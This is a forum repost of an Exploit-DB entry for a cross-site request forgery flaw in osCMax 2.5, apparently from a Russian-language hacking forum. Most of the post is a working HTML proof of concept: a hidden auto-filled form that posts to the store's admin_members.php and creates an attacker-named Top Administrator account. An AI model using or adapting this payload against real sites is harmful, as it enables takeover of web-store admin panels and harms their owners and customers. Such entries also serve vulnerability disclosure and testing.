Exploit osCMax 2.5 - Cross-Site Request Forgery

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
39118
Проверка EDB
  1. Пройдено
Автор
TUNISIAN CYBER
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
null
Дата публикации
2014-03-17
osCMax 2.5 - Cross-Site Request Forgery
HTML:
source: https://www.securityfocus.com/bid/66272/info

osCmax is prone to a cross-site request-forgery vulnerability because it does not properly validate HTTP requests.

Exploiting this issue may allow a remote attacker to perform certain unauthorized actions. This may lead to further attacks. 

<html>
<form method="post" name="newmember" action="http://127.0.0.1/catalog/admin/admin_members.php?action=member_new&page=1&mID=1">
<input type="hidden" name="admin_username" value="THETUNISIAN"/>
<input type="hidden" name="admin_firstname" value="Moot3x"/>
<input type="hidden" name="admin_lastname" value="Saad3x"/>
<input type="hidden" name="admin_email_address" value="[email protected]"/>
<input type="hidden" name="admin_groups_id" value="1"/>
<!-- About "admin_groups_id" -->
<!-- 1= Top Administrator -->
<!-- 2= Customer Service  -->
<input type='submit' name='Submit4' value="Agregar">
</form>
</html>
 
Источник
www.exploit-db.com

Похожие темы